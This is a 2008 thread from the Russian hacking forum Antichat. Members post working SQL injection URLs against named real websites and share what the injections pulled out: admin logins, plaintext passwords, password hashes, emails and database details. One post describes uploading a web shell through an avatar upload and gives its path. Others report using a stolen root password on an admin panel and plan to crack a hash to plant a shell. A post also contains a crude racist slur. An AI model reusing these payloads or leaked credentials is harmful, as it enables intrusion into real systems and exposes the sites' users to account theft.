Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.07.2008, 02:21
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.mylover.ru/?mode=rating&rating_id=1&pid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(l ogin,0x3a,pswd,0x3a,type),14,15,16,17,18,19,20,21, 22,23,24,25,26+from+mylover_data.members+limit+20, 29/*&mark=4
superkrasa::tufundenda
Есть phpmyadmin, но аутентификация не через бд.
|
|
|
27.07.2008, 04:57
|
|
Banned
Регистрация: 02.01.2008
Сообщений: 195
Провел на форуме:
523549
Репутация:
301
|
|
бажный скрипт_1:
Код:
http://webmuseum.mit.edu/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
бажный скрипт_2:
Код:
http://webmuseum.mit.edu/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/*
1:admin@mobius.xg:6416d795663220752ae6f7edc19c87bd :Y
 ) |
|
|
|
27.07.2008, 06:47
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
smart.ru
Код:
http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'%20AND%201=@@version--
Код:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
таблы
Код:
http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('')))--
xaction
Дальше
Код:
http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('xaction')))--
syssegments
Патом
Код:
http://www.smart.ru/catalog/goodinfo.asp?pkid=5&catid=187&level=4&barcode=080049101'+or(1=(select(max(table_name))from[information_schema].tables+WHERE+TABLE_NAME+NOT+IN+('xaction','syssegments')))--
sysconstraints
Ну чё я рассказываю, кому надо, поймут  |
|
|
|
27.07.2008, 07:21
|
|
Новичок
Регистрация: 26.07.2008
Сообщений: 20
Провел на форуме:
154110
Репутация:
14
|
|
РусьЕдиная.ру
Код:
http://russedina.ru/frontend/heading/economy?id=-999999+union+select+concat(name,0x3a,password),2,3+from+users/*
uralsJK3:uralsJKL
|
|
|
|
27.07.2008, 20:28
|
|
Новичок
Регистрация: 26.07.2008
Сообщений: 20
Провел на форуме:
154110
Репутация:
14
|
|
Агенство бизнес новостей // ТИЦ=2600 PR=6
Код:
http://www.abnews.ru/index.php?p=sudi_pravo_i_armiya&news=-999999999+union+select+1,2,3,4/*
Queen and Paul Rodgers - Homepage // ТИЦ=30 PR=5
Код:
http://www.queenpluspaulrodgers.com/index.php?news_id=-999999999+union+select+1,2,3,4,5,6,7,8/*
Ассоциация Практикующих Ветеринарных Врачей // ТИЦ=40 PR=5
Код:
http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
ОАО «Стеклозавод «НЕМАН» // ТИЦ=110 PR=3
Код:
http://www.neman.by/ru/index.php?news_id=-999999999+union+select+1/*
|
|
|
|
27.07.2008, 21:15
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.dunloptyres.ru/tyre.php?id=-1+union+select+1,unhex(hex(concat(login,0x3a,passw ord)))+from+partners+limit+1,1/*,:yes:
Login: DUN-OPT
Pass: 24DUN76df
Открытый пас, бесполезный сайт.
|
|
|
|
28.07.2008, 00:58
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
_http://www.hlbs.co.uk/type.php?id=19+union+select+1,2,3,4/*
_http://www.tgfs.com.au/type.php?no=2+union+select+1,2,3,4,5,6,7/*
_http://www.recipe.ru/docs/nd/type.php?id=3+union+select+1,2,3,4,5,6,7,8/*
_http://www.danaeco.ru/addinfo/catalog/type.php?id=-9+union+select+1,2,3,4,5,6,7,8/*
_http://www.burgessbeds.co.uk/product/type.php?id=-7+union+select+1,2,user(),4,5,6,7,8/*
version() - 4.0.30-log
user() - u10042967@lon1-webmysql-2.msh.demon.net
database() - u10042967
_http://alumni.yale.edu/aya/blueprint/type.php?id=-3+union+select+1,2,3,4,5,user()/*
version() - 4.1.20
user() - bp2005@localhost
database() - bpdb2
|
|
|
|
28.07.2008, 05:23
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.sibgastroli.ru/?content=shownews&id=-1+union+select+1,2,3,4,concat(psw,0x3a,user),name, 7,8,9,10,11,12+from+forum_users+limit+0,10/*
login: alone_hunter
password: bear
Выборка по юзерам форума.
Зы: Таких программистов нужно е**ть в сраку =)(Отдавать неграм на растерзание)
Через upload аватара закачивается все что угодно душе =)
Наш выбор madshell.php =)
http://sibgastroli.ru/_images/users/alone_hunter.php
Можно покопаться в корне freebsd'шки агавовского хостинга =)
|
|
|
|
28.07.2008, 05:25
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Забыл: 842637 это пас админа, superadmin! это его же логин.
http://sibgastroli.ru/admin - соответственно админка.
|
|
|
|
28.07.2008, 06:47
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Сообщение от Bonnie and Clyde
Ассоциация Практикующих Ветеринарных Врачей // ТИЦ=40 PR=5
Код:
http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Bonnie and Clyde
Код:
http://www.rsava.org/index.php?cat=54&news_id=-9999999+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables/*
TABLES:
article
banner
behaviour
blocks
calculation_articles
config
cost_articles
currensy
data_rassylka
doctors
faq
gallery_image
gallery_moduls
gallery_partition
gallery_people
gradation_execution_order
img_article
language
log
models
moduls
news
partition
rassylka
sale_on_rebate_percent
sclad
sidv_ban
sidv_cenzor
sidv_config
sidv_downloads
sidv_downloads_categoryes
sidv_downloads_comments
sidv_hqfaq
sidv_members
sidv_members_groups
sidv_members_in_groups
sidv_members_users
sidv_memrpass
sidv_modules
sidv_sessions
sidv_smiles
sidv_user
sidv_user_logs
sidv_zones
signs
time_table
user
user_outside
vote
vote_statistic
zakazy
news_file
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_sessions_keys
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
aqualung:e05cbba9cd092521901a26346a0e5f3f
то есть можно залить шелл через админку если хэш крякнуть
------
Есть админка:
таблица user:
root:zakryto_cossa
kot:kot
Я как рут увидал сразу понял куда впихать этот пасс
_http://www.rsava.org/admin/
------
Турецкий хекер уже задефейсил(то есть через день,вот падальщики )))
Последний раз редактировалось DDoSька; 28.07.2008 в 21:58..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
